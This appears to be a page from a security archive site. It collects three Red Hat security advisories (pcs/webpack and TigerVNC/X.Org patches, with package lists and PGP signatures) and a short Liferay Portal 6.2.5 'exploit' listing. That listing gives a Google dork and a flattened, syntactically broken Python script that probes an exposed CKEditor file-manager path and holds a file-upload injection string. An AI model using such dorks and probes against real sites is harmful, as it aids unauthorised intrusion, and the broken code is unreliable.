-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZCyTXNzjgjWX9erEAQh57hAAknElDhu4y424D1I96zILtTXiJrw+50LC  
xD4Vj3M7gY44/6QgBg8H4YzfKZjdWGAX1byaDC6Wzb6RqtSnU7LCGI3PwA4+N3SY  
a0AidcKXV0LccwTDQcykzNC47KABGDShLFmXx5jGKn7LNWxrZRpSPk9G/jJ2tD4T  
/TaZQT20pxFXKs4vZvqXkjBDk0NXMT60fv128iXsloriajum1g3IcmJoB5R4tHFF  
bKp+sTWBVlOBwjN1qvXZ/A8JkvzKiyeMeVRM/sAoiFHNdaKFiUAsafebXTJJ55YC  
7zHqsAIO1MznhhHuW7xqE4cJb58HBYDA/Q7xD5NONFYJn+nMWe6wNgB7GOL2vNOR  
18wT35+BOjUnY0N1Ew9EllAeNOP2rHn9Rknvr9N3Z3WVzUU6Jsn4JyicdVi96xj7  
1G/Mwu2/I4fZE0SkLF3YUI1eB0akNa9lASZ/i29XbyL3HuYhDLkdQ2qrRrCWOHf3  
MxkYFoBaQlKLnWI21B1AkqIcxiqfQQ9CRECTTl86R3IZRnnV49IXrowSIAZJQy0r  
hY6n+5BcvGLpqDkyYelp4zaoCwnlSJRsXOJMBW5shF/9QfB1eWT7dU3bxnl+MPUO  
tZ0iUmZjbzBsjvgiQ22377jDuhdMk95lRgaRF8kdy13cavaykF5MA2hitfIiucL7  
pG8zVEKEY3A=  
=vuaR  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1630-01

Red Hat Security Advisory 2023-1591-01 - The pcs packages provide a command-line configuration system for the Pacemaker and Corosync utilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: pcs security update  
Advisory ID:       RHSA-2023:1591-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1591  
Issue date:        2023-04-04  
CVE Names:         CVE-2023-28154   
=====================================================================

1. Summary:

An update for pcs is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux High Availability (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Resilient Storage (v. 9) - ppc64le, s390x, x86_64

3. Description:

The pcs packages provide a command-line configuration system for the  
Pacemaker and Corosync utilities.

Security Fix(es):

* webpack: avoid cross-realm objects (CVE-2023-28154)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2179227 - CVE-2023-28154 webpack: avoid cross-realm objects

6. Package List:

Red Hat Enterprise Linux High Availability (v. 9):

Source:  
pcs-0.11.3-4.el9_1.3.src.rpm

aarch64:  
pcs-0.11.3-4.el9_1.3.aarch64.rpm  
pcs-snmp-0.11.3-4.el9_1.3.aarch64.rpm

ppc64le:  
pcs-0.11.3-4.el9_1.3.ppc64le.rpm  
pcs-snmp-0.11.3-4.el9_1.3.ppc64le.rpm

s390x:  
pcs-0.11.3-4.el9_1.3.s390x.rpm  
pcs-snmp-0.11.3-4.el9_1.3.s390x.rpm

x86_64:  
pcs-0.11.3-4.el9_1.3.x86_64.rpm  
pcs-snmp-0.11.3-4.el9_1.3.x86_64.rpm

Red Hat Enterprise Linux Resilient Storage (v. 9):

Source:  
pcs-0.11.3-4.el9_1.3.src.rpm

ppc64le:  
pcs-0.11.3-4.el9_1.3.ppc64le.rpm  
pcs-snmp-0.11.3-4.el9_1.3.ppc64le.rpm

s390x:  
pcs-0.11.3-4.el9_1.3.s390x.rpm  
pcs-snmp-0.11.3-4.el9_1.3.s390x.rpm

x86_64:  
pcs-0.11.3-4.el9_1.3.x86_64.rpm  
pcs-snmp-0.11.3-4.el9_1.3.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-28154  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZCw/SNzjgjWX9erEAQgFiQ//cSTnnBTtcttxVs9yS2likrkJEbQMxdlk  
9P2vJJyx30d2I09mgAN7QU/8VVntlBJwBzGPBVn8UcIqSS2jHNNP22eQ4/3qAQqI  
pNDQoa+xvi8+M9sDWI4+/suFaLATvD5lZctbr7C4NgL2dMAnQh6vLdu7Noe61Z0/  
Oevb3WbH6VI8Gq+Xn5EVmLjYQCsFqi6rsQFFBWwlhpbDp+e4P8FE7QzYKfWQ62Ro  
u259cLje5O4L/iBVTsCNdC4i6ciTtelJvqQejfP22891EkuuKc52JteNk3olTZ9y  
yVDvEJwu4PrTwb7oEJ341XwoVvsl6QmGxUAVl9BBmf85umJkVx5hpsKKwIfpevEZ  
+ljH42KZMVzyTnW1vpxGd74PLa6TuOgiUHqf9jaVZ96xCUjY4z5ajfTqB0GJHG7K  
jg9LVy4OCX3aOma+Nqiv20t2OCCJ3WmfQfzAtUn91tWVzobl6XTB5Diu4GKZBBqi  
A2ROmiEtEVVafQ0XiiaisOLwYDzREXtKxjEHTTTTRejrNMi0TyeRcVN0Q/fNMTXm  
9jBw6nXi5uig7Ag+xAnFzDh2J5tEflKHt/EQ4NYCavSGyml1tQUFvsaRiJUn68Nw  
e+FI8SygXhZ6wdCSKB6REeTf92kaN8JtKmIeN65c/2Y5EG+jpc6R607H4zLbVP6o  
jYuOvRPIXvQ=  
=9+7P  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1591-01

Red Hat Security Advisory 2023-1600-01 - Virtual Network Computing is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients. Issues addressed include privilege escalation and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: tigervnc security update  
Advisory ID:       RHSA-2023:1600-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1600  
Issue date:        2023-04-04  
CVE Names:         CVE-2023-1393   
=====================================================================

1. Summary:

An update for tigervnc is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Virtual Network Computing (VNC) is a remote display system which allows  
users to view a computing desktop environment not only on the machine where  
it is running, but from anywhere on the Internet and from a wide variety of  
machine architectures. TigerVNC is a suite of VNC servers and clients.

Security Fix(es):

* xorg-x11-server: X.Org Server Overlay Window Use-After-Free Local  
Privilege Escalation Vulnerability (CVE-2023-1393)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2180288 - CVE-2023-1393 xorg-x11-server: X.Org Server Overlay Window Use-After-Free Local Privilege Escalation Vulnerability

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
tigervnc-1.9.0-16.el8_1.3.src.rpm

aarch64:  
tigervnc-1.9.0-16.el8_1.3.aarch64.rpm  
tigervnc-debuginfo-1.9.0-16.el8_1.3.aarch64.rpm  
tigervnc-debugsource-1.9.0-16.el8_1.3.aarch64.rpm  
tigervnc-server-1.9.0-16.el8_1.3.aarch64.rpm  
tigervnc-server-debuginfo-1.9.0-16.el8_1.3.aarch64.rpm  
tigervnc-server-minimal-1.9.0-16.el8_1.3.aarch64.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-16.el8_1.3.aarch64.rpm  
tigervnc-server-module-1.9.0-16.el8_1.3.aarch64.rpm  
tigervnc-server-module-debuginfo-1.9.0-16.el8_1.3.aarch64.rpm

noarch:  
tigervnc-icons-1.9.0-16.el8_1.3.noarch.rpm  
tigervnc-license-1.9.0-16.el8_1.3.noarch.rpm  
tigervnc-server-applet-1.9.0-16.el8_1.3.noarch.rpm

ppc64le:  
tigervnc-1.9.0-16.el8_1.3.ppc64le.rpm  
tigervnc-debuginfo-1.9.0-16.el8_1.3.ppc64le.rpm  
tigervnc-debugsource-1.9.0-16.el8_1.3.ppc64le.rpm  
tigervnc-server-1.9.0-16.el8_1.3.ppc64le.rpm  
tigervnc-server-debuginfo-1.9.0-16.el8_1.3.ppc64le.rpm  
tigervnc-server-minimal-1.9.0-16.el8_1.3.ppc64le.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-16.el8_1.3.ppc64le.rpm  
tigervnc-server-module-1.9.0-16.el8_1.3.ppc64le.rpm  
tigervnc-server-module-debuginfo-1.9.0-16.el8_1.3.ppc64le.rpm

s390x:  
tigervnc-1.9.0-16.el8_1.3.s390x.rpm  
tigervnc-debuginfo-1.9.0-16.el8_1.3.s390x.rpm  
tigervnc-debugsource-1.9.0-16.el8_1.3.s390x.rpm  
tigervnc-server-1.9.0-16.el8_1.3.s390x.rpm  
tigervnc-server-debuginfo-1.9.0-16.el8_1.3.s390x.rpm  
tigervnc-server-minimal-1.9.0-16.el8_1.3.s390x.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-16.el8_1.3.s390x.rpm

x86_64:  
tigervnc-1.9.0-16.el8_1.3.x86_64.rpm  
tigervnc-debuginfo-1.9.0-16.el8_1.3.x86_64.rpm  
tigervnc-debugsource-1.9.0-16.el8_1.3.x86_64.rpm  
tigervnc-server-1.9.0-16.el8_1.3.x86_64.rpm  
tigervnc-server-debuginfo-1.9.0-16.el8_1.3.x86_64.rpm  
tigervnc-server-minimal-1.9.0-16.el8_1.3.x86_64.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-16.el8_1.3.x86_64.rpm  
tigervnc-server-module-1.9.0-16.el8_1.3.x86_64.rpm  
tigervnc-server-module-debuginfo-1.9.0-16.el8_1.3.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-1393  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZCw/MNzjgjWX9erEAQiZOQ/9GfEZZmz5QHzTHPeD8+Mm2XqYLy5qTw2K  
BwYmh29U+xpEc1bNWY5MTs7Ae9QmOmSl3MQH8R42JAObYzjPUjfjz4ZPd8lJgE4E  
Jkk8O40iKqZ0Hvk9y7v2ag5TdEv1uYTOi+lAphIpAQKUNUGxS6uvjhSzey74j/EY  
3XOTurHs5c2e/odvmUM4DKLGre0lT4m52P/QYqj2okD/VE1YmeU1vi1F04PXrhGW  
1WtVPLdZj4zh2XoRpxAgkoUWQcHm/KxjTIDGGl2BtPcEFLZEv9FSgjfnSJLvLaq+  
K6wwBPkEFarmOvc02vF7T2zygQfHTtEQMRa1TxVGRmSXfd3rYENFRRLDqu1QTkku  
Ew9N5dwUf94PcvlcZaSNzI6YTSV3Z1l0Rik7bfnoa7+JxfolVww9QaWLxatNuLeh  
i1oqgO+LmvWkr4HpC1HoDcTHSXJteUoVeUz2UU8lM9JkVTyKvJoryxfVBAigTeqV  
g+LOXU09+Hxus1jl0IvXFBZ2GBwQSqbLX1s9+UpWo79Qt8pnKkMrSW+L50gr/SMB  
nuCAU7BGB3n62NXhEUmVOdASGyNe2uRAG3tvaK5mDH15wXYFdW7fhyLxKMQVZzto  
g/L196/6ckB8e6+C36e15XHWj6ODaY8gaPv9FJdcPaAqnTxquxiCYj8zY/1Fswv6  
l5qbN6r66cY=  
=1bjZ  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1600-01

Red Hat Security Advisory 2023-1594-01 - Virtual Network Computing is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients. X.Org is an open-source implementation of the X Window System. It provides the basic low-level functionality that full-fledged graphical user interfaces are designed upon. Issues addressed include privilege escalation and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: tigervnc and xorg-x11-server security update  
Advisory ID:       RHSA-2023:1594-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1594  
Issue date:        2023-04-04  
CVE Names:         CVE-2023-1393   
=====================================================================

1. Summary:

An update for tigervnc and xorg-x11-server is now available for Red Hat  
Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64

3. Description:

Virtual Network Computing (VNC) is a remote display system which allows  
users to view a computing desktop environment not only on the machine where  
it is running, but from anywhere on the Internet and from a wide variety of  
machine architectures. TigerVNC is a suite of VNC servers and clients.

X.Org is an open-source implementation of the X Window System. It provides  
the basic low-level functionality that full-fledged graphical user  
interfaces are designed upon.

Security Fix(es):

* xorg-x11-server: X.Org Server Overlay Window Use-After-Free Local  
Privilege Escalation Vulnerability (CVE-2023-1393)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2180288 - CVE-2023-1393 xorg-x11-server: X.Org Server Overlay Window Use-After-Free Local Privilege Escalation Vulnerability

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
tigervnc-1.8.0-25.el7_9.src.rpm  
xorg-x11-server-1.20.4-23.el7_9.src.rpm

noarch:  
tigervnc-icons-1.8.0-25.el7_9.noarch.rpm  
tigervnc-license-1.8.0-25.el7_9.noarch.rpm

x86_64:  
tigervnc-1.8.0-25.el7_9.x86_64.rpm  
tigervnc-debuginfo-1.8.0-25.el7_9.x86_64.rpm  
tigervnc-server-1.8.0-25.el7_9.x86_64.rpm  
tigervnc-server-minimal-1.8.0-25.el7_9.x86_64.rpm  
xorg-x11-server-Xephyr-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xorg-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-common-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

noarch:  
tigervnc-server-applet-1.8.0-25.el7_9.noarch.rpm  
xorg-x11-server-source-1.20.4-23.el7_9.noarch.rpm

x86_64:  
tigervnc-debuginfo-1.8.0-25.el7_9.x86_64.rpm  
tigervnc-server-module-1.8.0-25.el7_9.x86_64.rpm  
xorg-x11-server-Xdmx-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xnest-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xvfb-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xwayland-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.i686.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-devel-1.20.4-23.el7_9.i686.rpm  
xorg-x11-server-devel-1.20.4-23.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
tigervnc-1.8.0-25.el7_9.src.rpm

noarch:  
tigervnc-license-1.8.0-25.el7_9.noarch.rpm

x86_64:  
tigervnc-debuginfo-1.8.0-25.el7_9.x86_64.rpm  
tigervnc-server-minimal-1.8.0-25.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

Source:  
xorg-x11-server-1.20.4-23.el7_9.src.rpm

noarch:  
tigervnc-icons-1.8.0-25.el7_9.noarch.rpm  
tigervnc-server-applet-1.8.0-25.el7_9.noarch.rpm  
xorg-x11-server-source-1.20.4-23.el7_9.noarch.rpm

x86_64:  
tigervnc-1.8.0-25.el7_9.x86_64.rpm  
tigervnc-debuginfo-1.8.0-25.el7_9.x86_64.rpm  
tigervnc-server-1.8.0-25.el7_9.x86_64.rpm  
tigervnc-server-module-1.8.0-25.el7_9.x86_64.rpm  
xorg-x11-server-Xdmx-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xephyr-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xnest-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xorg-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xvfb-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xwayland-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-common-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.i686.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-devel-1.20.4-23.el7_9.i686.rpm  
xorg-x11-server-devel-1.20.4-23.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
tigervnc-1.8.0-25.el7_9.src.rpm  
xorg-x11-server-1.20.4-23.el7_9.src.rpm

noarch:  
tigervnc-icons-1.8.0-25.el7_9.noarch.rpm  
tigervnc-license-1.8.0-25.el7_9.noarch.rpm

ppc64:  
tigervnc-1.8.0-25.el7_9.ppc64.rpm  
tigervnc-debuginfo-1.8.0-25.el7_9.ppc64.rpm  
tigervnc-server-1.8.0-25.el7_9.ppc64.rpm  
tigervnc-server-minimal-1.8.0-25.el7_9.ppc64.rpm  
xorg-x11-server-Xephyr-1.20.4-23.el7_9.ppc64.rpm  
xorg-x11-server-Xorg-1.20.4-23.el7_9.ppc64.rpm  
xorg-x11-server-common-1.20.4-23.el7_9.ppc64.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.ppc64.rpm

ppc64le:  
tigervnc-1.8.0-25.el7_9.ppc64le.rpm  
tigervnc-debuginfo-1.8.0-25.el7_9.ppc64le.rpm  
tigervnc-server-1.8.0-25.el7_9.ppc64le.rpm  
tigervnc-server-minimal-1.8.0-25.el7_9.ppc64le.rpm  
xorg-x11-server-Xephyr-1.20.4-23.el7_9.ppc64le.rpm  
xorg-x11-server-Xorg-1.20.4-23.el7_9.ppc64le.rpm  
xorg-x11-server-common-1.20.4-23.el7_9.ppc64le.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.ppc64le.rpm

s390x:  
tigervnc-1.8.0-25.el7_9.s390x.rpm  
tigervnc-debuginfo-1.8.0-25.el7_9.s390x.rpm  
tigervnc-server-1.8.0-25.el7_9.s390x.rpm  
tigervnc-server-minimal-1.8.0-25.el7_9.s390x.rpm  
xorg-x11-server-Xephyr-1.20.4-23.el7_9.s390x.rpm  
xorg-x11-server-common-1.20.4-23.el7_9.s390x.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.s390x.rpm

x86_64:  
tigervnc-1.8.0-25.el7_9.x86_64.rpm  
tigervnc-debuginfo-1.8.0-25.el7_9.x86_64.rpm  
tigervnc-server-1.8.0-25.el7_9.x86_64.rpm  
tigervnc-server-minimal-1.8.0-25.el7_9.x86_64.rpm  
xorg-x11-server-Xephyr-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xorg-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-common-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

noarch:  
tigervnc-server-applet-1.8.0-25.el7_9.noarch.rpm  
xorg-x11-server-source-1.20.4-23.el7_9.noarch.rpm

ppc64:  
tigervnc-debuginfo-1.8.0-25.el7_9.ppc64.rpm  
tigervnc-server-module-1.8.0-25.el7_9.ppc64.rpm  
xorg-x11-server-Xdmx-1.20.4-23.el7_9.ppc64.rpm  
xorg-x11-server-Xnest-1.20.4-23.el7_9.ppc64.rpm  
xorg-x11-server-Xvfb-1.20.4-23.el7_9.ppc64.rpm  
xorg-x11-server-Xwayland-1.20.4-23.el7_9.ppc64.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.ppc.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.ppc64.rpm  
xorg-x11-server-devel-1.20.4-23.el7_9.ppc.rpm  
xorg-x11-server-devel-1.20.4-23.el7_9.ppc64.rpm

ppc64le:  
tigervnc-debuginfo-1.8.0-25.el7_9.ppc64le.rpm  
tigervnc-server-module-1.8.0-25.el7_9.ppc64le.rpm  
xorg-x11-server-Xdmx-1.20.4-23.el7_9.ppc64le.rpm  
xorg-x11-server-Xnest-1.20.4-23.el7_9.ppc64le.rpm  
xorg-x11-server-Xvfb-1.20.4-23.el7_9.ppc64le.rpm  
xorg-x11-server-Xwayland-1.20.4-23.el7_9.ppc64le.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.ppc64le.rpm  
xorg-x11-server-devel-1.20.4-23.el7_9.ppc64le.rpm

s390x:  
xorg-x11-server-Xdmx-1.20.4-23.el7_9.s390x.rpm  
xorg-x11-server-Xnest-1.20.4-23.el7_9.s390x.rpm  
xorg-x11-server-Xvfb-1.20.4-23.el7_9.s390x.rpm  
xorg-x11-server-Xwayland-1.20.4-23.el7_9.s390x.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.s390x.rpm

x86_64:  
tigervnc-debuginfo-1.8.0-25.el7_9.x86_64.rpm  
tigervnc-server-module-1.8.0-25.el7_9.x86_64.rpm  
xorg-x11-server-Xdmx-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xnest-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xvfb-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xwayland-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.i686.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-devel-1.20.4-23.el7_9.i686.rpm  
xorg-x11-server-devel-1.20.4-23.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
tigervnc-1.8.0-25.el7_9.src.rpm  
xorg-x11-server-1.20.4-23.el7_9.src.rpm

noarch:  
tigervnc-icons-1.8.0-25.el7_9.noarch.rpm  
tigervnc-license-1.8.0-25.el7_9.noarch.rpm

x86_64:  
tigervnc-1.8.0-25.el7_9.x86_64.rpm  
tigervnc-debuginfo-1.8.0-25.el7_9.x86_64.rpm  
tigervnc-server-1.8.0-25.el7_9.x86_64.rpm  
tigervnc-server-minimal-1.8.0-25.el7_9.x86_64.rpm  
xorg-x11-server-Xephyr-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xorg-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-common-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

noarch:  
tigervnc-server-applet-1.8.0-25.el7_9.noarch.rpm  
xorg-x11-server-source-1.20.4-23.el7_9.noarch.rpm

x86_64:  
tigervnc-debuginfo-1.8.0-25.el7_9.x86_64.rpm  
tigervnc-server-module-1.8.0-25.el7_9.x86_64.rpm  
xorg-x11-server-Xdmx-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xnest-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xvfb-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-Xwayland-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.i686.rpm  
xorg-x11-server-debuginfo-1.20.4-23.el7_9.x86_64.rpm  
xorg-x11-server-devel-1.20.4-23.el7_9.i686.rpm  
xorg-x11-server-devel-1.20.4-23.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-1393  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZCw/LtzjgjWX9erEAQiXQQ//YJZInT4twZ3D/vsM319cZtvZpZCTIAoY  
1x2/lWGIUJsZ5fojf6VFY0raK/iSs4ZQrodt+lEixJn/fq34zCvM5cWDiqIibKRN  
4dz0aO/M4ot/lXtCGDiq85t0ejWz4T47ivinAcYXCyMO78AHu5r6n2l7TGBzIwjt  
dlfTE4K7btDpM6p1aqx6llHaq057bG5MMS/VoY8bmPV6/N9rFN2IeU8c1JmzSFN0  
W38GfJ0Pv8EtxFBrGLFrrRT3kWoBFe7iu1m3z4qaOXJ5EvyIQDDACkqhQb6ZGv1K  
T+waZy/nRGKBYYDgVEUQhCt17h2GuRqOqPKAWzMpmXgQ98LbH9d367EpMaevvQtl  
qlBbx/GAvPlqn9/VF6dNKx8EO8Asx99SY6Wnu3N2YHTSkCgCbGultbWg62btJKJE  
v50Su9xikzO1mNuSvYIagFPN0MOcdR9cJuTjMgVjgY2yCZKONilJRznQTlXuaUBn  
kRR1wwaU/vpTb936Ka4mgsY7NhXoQnyF0pgx6dTD3Q4rj40114W5tWlhSJJ6pRum  
1qFSzSNm+BGlirytDodjEInkMJvaHFuzXGkvseCgROtFyUWkvpkqWFuWvW0g4F6e  
yktfCPFP3dKPCAohgmkaZzgCGBRjz7Do+5/OAd5QN7gT+oMNBaHSr+pM+4hdiVRr  
NWwFhE95uHk=  
=tIcO  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1594-01

Liferay Portal version 6.2.5 suffers from an insecure permissions vulnerability.

**Liferay Portal 6.2.5 Insecure Permissions**

Posted Apr 5, 2023

Authored by fu2x2000

Liferay Portal version 6.2.5 suffers from an insecure permissions vulnerability.

tags | exploit

advisories | CVE-2021-33990

SHA-256 | e3e411dfd9f5109ca37b6290d45f0e2d70ef14dec30d730427fdf7979b0850b5

Download | Favorite | View

**Liferay Portal 6.2.5 Insecure Permissions**

    # Exploit Title: Liferay Portal 6.2.5 - Insecure Permissions# Google Dork: -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/# Date: 2021/05# Exploit Author: fu2x2000# Version: Liferay Portal 6.2.5 or later# CVE : CVE-2021-33990 import requestsimport jsonprint (" Search this on Google #Dork for liferay-inurl:/html/js/editor/ckeditor/editor/filemanager/browser/")url ="URL Goes Here/html/js/editor/ckeditor/editor/filemanager/browser/liferay/frmfolders.html"req = requests.get(url)print reqsta = req.status_codeif sta == 200:print ('Life Vulnerability exists')cook = urlprint cookinject = "Command=FileUpload&Type=File&CurrentFolder=/"#cook_inject = cook+inject#print cook_injectelse:print ('not found try a another method')print ("solution restrict access and user groups")

**File Tags**

*   ActiveX (932)
*   Advisory (80,663)
*   Arbitrary (15,931)
*   BBS (2,859)
*   Bypass (1,655)
*   CGI (1,022)
*   Code Execution (7,067)
*   Conference (677)
*   Cracker (840)
*   CSRF (3,307)
*   DoS (22,956)
*   Encryption (2,359)
*   Exploit (50,803)
*   File Inclusion (4,186)
*   File Upload (951)
*   Firewall (821)
*   Info Disclosure (2,691)
*   Intrusion Detection (876)
*   Java (2,961)
*   JavaScript (831)
*   Kernel (6,471)
*   Local (14,314)
*   Magazine (586)
*   Overflow (12,549)
*   Perl (1,419)
*   PHP (5,111)
*   Proof of Concept (2,297)
*   Protocol (3,505)
*   Python (1,488)
*   Remote (30,329)
